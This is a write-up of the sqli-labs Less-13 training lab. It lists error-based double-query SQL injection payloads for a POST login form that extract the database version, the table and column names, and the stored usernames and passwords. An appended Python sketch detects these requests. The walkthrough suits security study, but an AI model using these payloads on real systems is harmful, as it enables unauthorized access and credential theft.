sqli-labs Less-13

2020-04-23 12:21

Less-13 POST -Double Injection -Single quotes -String - with twist

0x01

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1') LIMIT 0,1' at line 1

Based on the error message, the string can be closed with ')

uname=') or 1=1#

0x02. Get the database version

uname= ') union select count(*),concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit


0x03. Get the database name

uname= ') union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit


0x04. Get the table names

uname=') union select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema='security' limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit


Other table names can be obtained by changing the limit value

uname=') union select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema='security' limit 3,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

0x05. Get the column names

uname=') union select count(*),concat((select concat(column_name,0x3a,0x3a) from information_schema.columns where table_schema='security'and table_name='users'limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

uname=') union select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit


0x06. Get the number of fields

uname=') union select count(*),concat((select concat(count(*),0x3a,0x3a) from security.users limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit


0x07. Get the field values

uname=') union select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

For the specific meaning and explanation of the query statements, see Less-5
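From the defender's side, the requests above share a recognizable shape: a `')` break-out followed by `count(*)`, `floor(rand()*2)` and `group by` in a single form field. The following detection sketch is an added example, not part of the original post; the trait names, the `verdict` labels and the sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlencode

# Traits of the duplicate-key error queries shown in this walkthrough.
TRAITS = {
    "quote_paren_break": re.compile(r"'\s*\)\s*(or|and|union)\b"),
    "count_star": re.compile(r"count\s*\(\s*\*\s*\)"),
    "floor_rand": re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)"),
    "group_by": re.compile(r"\bgroup\s+by\b"),
    "information_schema": re.compile(r"\binformation_schema\b"),
    "trailing_comment": re.compile(r"(#|--)\s*$"),
}
DUPLICATE_KEY = {"count_star", "floor_rand", "group_by"}

def normalize(value):
    """Lowercase, drop /* */ comments and collapse whitespace before matching."""
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value).strip().lower()

def inspect_body(body):
    """Return {field: [trait names]} for a urlencoded POST body."""
    findings = {}
    for field, values in parse_qs(body, keep_blank_values=True).items():
        hits = {n for v in values for n, rx in TRAITS.items() if rx.search(normalize(v))}
        if hits:
            findings[field] = sorted(hits)
    return findings

def verdict(body):
    findings = inspect_body(body)
    if any(DUPLICATE_KEY <= set(h) for h in findings.values()):
        return "block"   # all three parts of the duplicate-key trick in one field
    return "review" if findings else "allow"

# Constructed sample bodies: the first reuses the 0x02 request from this page.
SAMPLE_ATTACK = urlencode({
    "uname": "') union select count(*),concat(0x3a,0x3a,(select version()),0x3a,0x3a,"
             "floor(rand()*2))as a from information_schema.tables group by a # ",
    "passwd": "') or 1=1 # ", "submit": "Submit"})
SAMPLE_PROBE = urlencode({"uname": "') or 1=1#", "passwd": "x", "submit": "Submit"})
SAMPLE_BENIGN = urlencode({"uname": "O'Brien", "passwd": "p@ss#2020 (ok)", "submit": "Submit"})

if __name__ == "__main__":
    for name, body in [("attack", SAMPLE_ATTACK), ("probe", SAMPLE_PROBE), ("benign", SAMPLE_BENIGN)]:
        print(name, verdict(body), inspect_body(body))
```

Pattern matching like this only flags requests for triage; the underlying fix is to bind uname and passwd as query parameters and to stop returning MySQL error text to the client.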
